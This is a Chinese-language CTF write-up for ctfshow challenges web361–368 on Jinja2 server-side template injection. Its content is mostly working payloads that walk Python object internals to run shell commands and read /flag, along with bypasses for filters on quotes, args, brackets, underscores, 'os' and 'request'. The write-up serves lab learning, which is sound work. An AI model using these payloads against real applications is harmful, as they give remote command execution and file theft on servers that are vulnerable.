ctfshow-web入门-SSTI(web361-web368)上

目录

1、web361

2、web362

3、web363

4、web364

5、web365

6、web366

7、web367

8、web368


1、web361

测试一下存在 SSTI 注入

方法很多

(1)使用子类可以直接调用的函数来打

payload1:

?name={{''.__class__.__base__.__subclasses__()[94]["get_data"](0,"/flag")}}

payload2:

?name={{''.__class__.__base__.__subclasses__()[407]('cat /flag',shell=True,stdout=-1).communicate()[0].strip()}}

(2)使用重载函数

payload3:

?name={{''.__class__.__base__.__subclasses__()[290].__init__.__globals__['os'].popen('cat /flag').read()}}

payload4:

?name={{''.__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']('ls').read()}}

payload5:

?name={{''.__class__.__base__.__subclasses__()[292].__init__.__globals__['linecache']['os'].popen('ls /').read()}}}}

(3)使用内嵌函数

payload6:

?name={{''.__class__.__base__.__subclasses__()[446].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('whoami').read()")}}

对于这种没有过滤的,还有其他很多很多方法,这里就不列举了。

2、web362

开始过滤

模糊测试看一下,过滤了 2 和 3

随便拿个 payload 打吧:

?name={{''.__class__.__base__.__subclasses__()[94]["get_data"](0,"/flag")}}

3、web363

过滤了单双引号

方法也很多,这里采用 get 传参绕过:

?name={{().__class__.__base__.__subclasses__()[94][request.args.m1](0,request.args.m2)}}&m1=get_data&m2=/flag

4、web364

过滤了 args

并且 post 传参不允许

那就传给 cookie 吧

?name={{().__class__.__base__.__subclasses__()[94][request.cookies.m1](0,request.cookies.m2)}}
cookie传入:m1=get_data;m2=/flag

5、web365

新增过滤中括号

原本是在上面的 payload 上改,但是要连续用两次 [],有点问题,我们换个 payload:

?name={{().__class__.__base__.__subclasses__().pop(290).__init__.__globals__.pop(request.cookies.m1).popen(request.cookies.m2).read()}}

cookie:m1=os;m2=cat /flag

这个 payload 是一次性的,因为 pop 会删除里面的键,导致环境崩溃

更保险的是使用 getitem ,方法同上

6、web366

新增过滤了下划线

前面的 payload 太长了,构造起来比较麻烦和乱

换个短点的 payload 结合过滤器绕过:

?name={{(lipsum|attr(request.cookies.m1)).os.popen(request.cookies.m2).read()}}
cookie:m1=__globals__;m2=cat /flag

7、web367

新增过滤 os

一起传给 cookie

?name={{(lipsum|attr(request.cookies.m1)).get(request.cookies.m3).popen(request.cookies.m2).read()}}

cookie:m1=__globals__;m2=cat /flag;m3=os

8、web368

双大括号中过滤了 request

但是 {% %} 中可用

payload:

?name={%print((lipsum|attr(request.cookies.m1)).get(request.cookies.m3).popen(request.cookies.m2).read())%}

cookie:m1=__globals__;m2=cat /flag;m3=os
相关推荐
放逐者-保持本心,方可放逐44 分钟前
微信小程序=》基础=》常见问题=》性能总结
前端·微信小程序·小程序·前端框架
PcVue China1 小时前
PcVue + SQL Grid : 释放数据的无限潜力
大数据·服务器·数据库·sql·科技·安全·oracle
L_cl2 小时前
Python学习从0到1 day26 第三阶段 Spark ④ 数据输出
学习
小白学大数据2 小时前
Python爬虫开发中的分析与方案制定
开发语言·c++·爬虫·python
Mephisto.java2 小时前
【大数据学习 | HBASE】hbase的读数据流程与hbase读取数据
大数据·学习·hbase
Shy9604183 小时前
Doc2Vec句子向量
python·语言模型
毋若成3 小时前
前端三大组件之CSS,三大选择器,游戏网页仿写
前端·css
红中马喽3 小时前
JS学习日记(webAPI—DOM)
开发语言·前端·javascript·笔记·vscode·学习
Black蜡笔小新4 小时前
网页直播/点播播放器EasyPlayer.js播放器OffscreenCanvas这个特性是否需要特殊的环境和硬件支持
前端·javascript·html
尘浮生4 小时前
Java项目实战II基于微信小程序的移动学习平台的设计与实现(开发文档+数据库+源码)
java·开发语言·数据库·spring boot·学习·微信小程序·小程序